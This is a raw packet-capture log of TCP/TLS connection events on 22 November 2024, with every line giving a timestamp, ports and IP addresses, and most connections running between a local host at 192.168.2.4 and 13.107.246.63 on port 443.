                                                                                                                                                                                                            Nov 22, 2024 04:27:06.169825077 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.169902086 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.170001984 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.170046091 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.170074940 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.170090914 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.173589945 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.173635006 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.173723936 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.173835039 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.173846960 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.233971119 CET8049724199.232.210.172192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.234108925 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.310255051 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.310337067 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.310395002 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.310555935 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.310580969 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.310597897 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.310605049 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.313425064 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.313465118 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.313541889 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.313673019 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.313688040 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.365377903 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.365544081 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.365706921 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.365762949 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.365762949 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.365780115 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.365788937 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.369015932 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.369059086 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.369137049 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.369282961 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.369297981 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.586163998 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.586333990 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.586416960 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.586544991 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.586565971 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.586576939 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.586582899 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.589705944 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.589745998 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.589842081 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.590059042 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.590073109 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:07.705347061 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:07.706022978 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:07.706067085 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:07.706531048 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:07.706540108 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.024024963 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.024523973 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.024545908 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.025016069 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.025022030 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.124061108 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.124548912 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.124573946 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.125011921 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.125016928 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.139537096 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.139682055 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.139748096 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.153141022 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.153187037 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.153202057 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.153211117 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.175240040 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.201734066 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.201750994 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.208777905 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.208792925 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.223902941 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.253274918 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.253304005 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.282186031 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.282196999 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.369705915 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.369755030 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.369846106 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.370043039 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.370052099 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.478168011 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.478250980 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.478312016 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.478457928 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.478478909 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.478492975 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.478499889 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.481142998 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.481180906 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.481236935 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.481467009 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.481482029 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.574990034 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.575078964 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.575243950 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.575335026 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.575335026 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.575356960 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.575368881 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.578325987 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.578376055 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.578507900 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.578593016 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.578604937 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.630016088 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.630213022 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.630378962 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.630378962 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.630378962 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.633326054 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.633383036 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.633485079 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.633759022 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.633780956 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.678153992 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.678256035 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.678323984 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.678476095 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.678494930 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.678504944 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.678510904 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.681600094 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.681639910 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.681802034 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.681916952 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.681929111 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.945008039 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:08.945048094 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.263010025 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.263487101 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.263504982 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.264019966 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.264024973 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.421458960 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.422991991 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.423011065 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.423475027 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.423480034 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.427463055 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.427794933 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.427815914 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.428206921 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.428219080 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.440942049 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.441262960 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.441291094 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.441665888 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.441672087 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.463579893 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.464076996 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.464091063 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.464565039 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.464572906 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.707684040 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.707756996 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.707838058 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.708060980 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.708060980 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.708075047 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.708086014 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.711515903 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.711553097 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.711632967 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.711760998 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.711772919 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.865700006 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.865890026 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.865992069 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.879733086 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.879815102 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.879911900 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.887665033 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.887748957 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.887794971 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.887929916 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.887929916 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.887953997 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.887964964 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.889437914 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.889453888 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.889466047 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.889472008 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.890522003 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.890522003 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.890538931 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.890547991 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.904371977 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.904412031 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.904478073 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.910896063 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.910911083 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.911508083 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.911597967 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.911818027 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.914760113 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.914760113 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.914773941 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.914793968 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.919569969 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.919609070 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.919671059 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.924715996 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.924748898 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.924802065 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.924943924 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.924959898 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.931974888 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.931997061 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.936777115 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.936836958 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.936902046 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.939856052 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:10.939886093 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.457660913 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.458369970 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.458405972 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.458796978 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.458802938 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.668662071 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.669305086 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.669333935 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.669831991 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.669837952 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.672873020 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.673257113 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.673288107 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.673660994 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.673666954 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.728189945 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.729957104 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.729970932 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.730604887 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.730611086 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.811907053 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.812361956 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.812391043 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.812829018 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.812836885 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.892744064 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.892822981 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.892874002 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.893184900 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.893203974 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.893215895 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.893224001 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.896121979 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.896166086 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.896239042 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.896374941 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:12.896384954 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.101478100 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.101634979 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.101700068 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.101830006 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.101850033 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.101864100 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.101871014 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.104475021 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.104518890 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.104598045 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.104727030 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.104743958 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.107220888 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.107430935 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.107484102 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.107515097 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.107536077 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.107547998 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.107556105 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.109392881 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.109447002 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.109500885 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.109663963 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.109684944 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.174222946 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.174319029 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.174385071 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.266511917 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:13.266705036 CET4434988013.107.246.63192.168.2.4
